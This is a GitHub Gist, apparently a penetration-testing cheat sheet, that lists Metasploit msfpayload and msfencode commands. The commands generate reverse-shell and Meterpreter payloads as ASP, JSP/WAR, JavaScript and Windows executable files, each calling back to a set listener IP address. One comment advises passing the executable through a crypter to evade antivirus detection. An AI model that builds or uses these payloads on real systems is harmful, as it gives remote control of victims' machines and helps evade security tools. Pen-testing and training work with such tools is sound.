Last active
August 17, 2021 07:55
-
-
Save sckalath/03b4f3945cb10f9b2575 to your computer and use it in GitHub Desktop.
msfpayload commands
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# generate windows meterpreter on port 4444 that outputs an asp file | |
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R | msfencode -o mwcb.asp -e generic/none -t asp | |
#generate jsp reverse tcp over port 443 | |
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp | |
#would likely need to add this jsp to a WAR file for deployment | |
jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir | |
#simple javascript reverse shell over port 443 | |
msfpayload windows/shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 J | |
#linux reverse shell over port 443 in javascript | |
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 J | |
#generating a meterpreter exe over port 443 -- should probably run through hyperion first | |
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.184 LPORT=443 X > meterpreter.exe |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment